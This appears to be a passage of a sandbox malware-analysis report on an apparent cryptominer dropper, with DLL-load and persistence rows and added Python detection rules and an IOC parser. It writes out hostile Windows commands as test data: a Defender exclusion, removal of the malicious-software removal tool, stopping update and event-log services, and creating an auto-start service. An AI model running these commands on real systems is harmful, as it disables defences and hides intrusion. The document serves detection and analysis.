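Read in order, the entries above form one installer chain that both dropped executables run identically: a Defender exclusion for the user profile and ProgramData, the Malicious Software Removal Tool update (KB890830) uninstalled, the Update Orchestrator, Update Medic, Windows Update, BITS and Delivery Optimization services stopped, standby and hibernate timeouts set to zero so the host never sleeps, an auto-start service created under C:\ProgramData, and finally the EventLog service stopped. The Python below is an added example, not part of the report and not the sandbox's own detection logic: it runs a small rule set over (parent, child command line) pairs transcribed from the entries above, plus one benign conhost spawn as a control. The rule names, the ATT&CK mapping and the verdict threshold are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample: (parent image, child command line) pairs transcribed
# from the "Process created" entries above, plus one benign conhost spawn as
# a control. Test input for the rules, not a parser for the report itself.
PARENT = r"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
SAMPLE_EVENTS = [
    (PARENT, r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
             r"-ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    (PARENT, r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    (PARENT, r"C:\Windows\system32\sc.exe stop UsoSvc"),
    (PARENT, r"C:\Windows\system32\sc.exe stop WaaSMedicSvc"),
    (PARENT, r"C:\Windows\system32\sc.exe stop wuauserv"),
    (PARENT, r"C:\Windows\system32\sc.exe stop bits"),
    (PARENT, r"C:\Windows\system32\sc.exe stop dosvc"),
    (PARENT, r"C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0"),
    (PARENT, r"C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0"),
    (PARENT, r"C:\Windows\system32\dialer.exe"),
    (PARENT, r'C:\Windows\system32\sc.exe delete "CKTJZLMO"'),
    (PARENT, r'C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= '
             r'"C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"'),
    (PARENT, r"C:\Windows\system32\sc.exe stop eventlog"),
    (PARENT, r'C:\Windows\system32\sc.exe start "CKTJZLMO"'),
    (r"C:\Windows\System32\sc.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# (rule name, ATT&CK technique, pattern over the child command line).
# Names and technique mapping are this example's own, not Joe Sandbox's.
RULES = [
    ("defender_exclusion_added", "T1562.001",
     re.compile(r"powershell(\.exe)?\b.*\bAdd-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I)),
    ("update_service_stopped", "T1562.001",
     re.compile(r"\bsc(\.exe)?\s+stop\s+(UsoSvc|WaaSMedicSvc|wuauserv|bits|dosvc)\b", re.I)),
    ("eventlog_service_stopped", "T1562.002",
     re.compile(r"\bsc(\.exe)?\s+stop\s+eventlog\b", re.I)),
    ("power_timeouts_zeroed", "T1653",
     re.compile(r"\bpowercfg(\.exe)?\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b", re.I)),
    ("mrt_update_uninstalled", "T1562.001",
     re.compile(r"\bwusa(\.exe)?\b.*/uninstall\s+/kb:890830\b", re.I)),
    ("autostart_service_in_programdata", "T1543.003",
     re.compile(r'\bsc(\.exe)?\s+create\b.*binpath=\s*"?[A-Za-z]:\\ProgramData\\.*start=\s*"?auto', re.I)),
]


def bare_dialer_launch(parent: str, cmdline: str) -> bool:
    """dialer.exe started with no arguments by a parent outside C:\\Windows.

    dialer.exe does nothing useful without arguments, and the Code function
    entries above show token-privilege and registry-ACL code running inside
    the dialer.exe instances, which a stock dialer.exe does not contain.
    """
    tokens = cmdline.strip().split()
    if len(tokens) != 1:
        return False
    image = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()
    return image == "dialer.exe" and not parent.lower().startswith("c:\\windows\\")


def triage(events):
    """Map every rule that fired to the command lines that triggered it."""
    hits = defaultdict(list)
    for parent, cmdline in events:
        for name, _technique, pattern in RULES:
            if pattern.search(cmdline):
                hits[name].append(cmdline)
        if bare_dialer_launch(parent, cmdline):
            hits["bare_dialer_launch"].append(cmdline)
    return dict(hits)


def verdict(hits):
    """Collapse rule hits into one line.

    A Defender exclusion plus a new auto-start service under ProgramData is
    the installer pattern of the sample this report classifies as mal100;
    either alone is only suspicious (admins add exclusions, installers create
    services), which is why the threshold requires both.
    """
    if "defender_exclusion_added" in hits and "autostart_service_in_programdata" in hits:
        return "malicious: defense evasion followed by service persistence"
    if hits:
        return "suspicious: " + ", ".join(sorted(hits))
    return "no findings"


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for name, lines in found.items():
        print(f"{name}: {len(lines)} hit(s)")
    print(verdict(found))
```

The rules key on command-line text alone, which is what a process-creation log (Sysmon event 1, Security 4688 with command-line auditing) gives you; the parent check in bare_dialer_launch is the only rule that needs the parent image, and it is there because the same chain appears twice in the report under two different dropped parents.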
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\kx new.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\dialer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\kx new.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: kx new.exe | Static file information: File size 10948608 > 1048576
Source: kx new.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa70000
Source: Binary string: T].PdBB?0_$u3J~7 | source: kx new.exe, 00000000.00000002.1446358805.0000000000402000.00000002.00000001.01000000.00000003.sdmp, kx new.exe, 00000000.00000001.1426821105.0000000000402000.00000002.00000001.01000000.00000003.sdmp
Source: Kawpow new.exe.0.dr | Static PE information: section name: .00cfg
Source: xmr new.exe.0.dr | Static PE information: section name: .00cfg
Source: eejhedztifcv.exe.6.dr | Static PE information: section name: .00cfg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F142A8 push ebx; ret 2_2_04F142DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04F16F1C pushad ; ret 2_2_04F16F23
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CF7ACDD push rcx; retf 003Fh 10_2_000002534CF7ACDE
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA60F0 push rbp; retf 10_2_000002534CFA60F3
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA60E0 push r14; retf 10_2_000002534CFA60EB
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA60A8 push rbp; retf 10_2_000002534CFA60AB
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6080 push rbp; retf 10_2_000002534CFA6083
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6078 push rbp; retf 10_2_000002534CFA6083
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6070 push rbp; retf 10_2_000002534CFA6073
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6038 push r14; retf 10_2_000002534CFA6043
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6168 push rsi; retf 10_2_000002534CFA61D3
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6198 push rbp; retf 10_2_000002534CFA619B
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6180 push rbp; retf 10_2_000002534CFA6183
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6168 push rsi; retf 10_2_000002534CFA61D3
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6160 push rbp; retf 10_2_000002534CFA6163
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6138 push rsi; retf 10_2_000002534CFA6143
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6130 push rbp; retf 10_2_000002534CFA6133
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFAC6DD push rcx; retf 003Fh 10_2_000002534CFAC6DE
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA62C8 push rbp; retf 10_2_000002534CFA62B3
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA62C8 push rbp; retf 10_2_000002534CFA62CB
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA62B0 push rbp; retf 10_2_000002534CFA62B3
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6238 push rbp; retf 10_2_000002534CFA623B
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6218 push rbp; retf 10_2_000002534CFA621B
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Code function: 10_2_000002534CFA6208 push rsi; retf 10_2_000002534CFA620B
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E99173ACDD push rcx; retf 003Fh 59_2_000002E99173ACDE
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E99176C6DD push rcx; retf 003Fh 59_2_000002E99176C6DE
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E991759FA4 push rbp; retf 59_2_000002E99176626B
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E991766130 push rbp; retf 59_2_000002E991766133
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E991766138 push rsi; retf 59_2_000002E991766143
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E991766100 push rbp; retf 59_2_000002E99176610B
Source: C:\Windows\System32\winlogon.exe | Code function: 59_2_000002E991766100 push rbp; retf 59_2_000002E99176610B

Persistence and Installation Behavior

Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\lsass.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\xmr new.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\Desktop\kx new.exe | File created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe | File created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
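The rows above are what an analyst actually hunts on: the SHA-1 thumbprint of the root certificate written through lsass.exe, the three dropped executables, and the `sc.exe stop UsoSvc` command. The following parser is an added example, not part of the Joe Sandbox report, that turns rows in this layout into de-duplicated IOC lists. The list of event labels, the regular expressions and the sample rows (copied from this page, with the "Jump to ..." link text and a stray "barindex" anchor left in on purpose) are this example's own assumptions about the row format; nothing here is Joe Sandbox code.

```python
"""Extract hunt-ready IOCs from Joe Sandbox behaviour rows.

In the extracted text the source column is glued to the event label
("kx new.exeFile created: ..."), so rows are split on the known event
labels rather than on whitespace.
"""
import json
import re

# Event labels seen in the rows above (assumption: not an exhaustive list).
EVENT_LABELS = (
    "Registry value created",
    "Key value created or modified",
    "File created",
    "Process created",
    "IAT, EAT, inline or SSDT hook detected",
    "User mode code has changed",
)

ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*"
    r"(?P<event>" + "|".join(re.escape(label) for label in EVENT_LABELS) + r"):\s*"
    r"(?P<detail>.*?)\s*(?:Jump to (?:behavior|dropped file))?\s*$"
)
# SHA-1 thumbprint naming a certificate under the machine ROOT store.
ROOT_CERT_RE = re.compile(r"\\SystemCertificates\\ROOT\\Certificates\\([0-9A-Fa-f]{40})\b")
HOOKED_FUNC_RE = re.compile(r"\bfunction:\s*(\w+)")

# Constructed sample input: rows copied from this report's Persistence and
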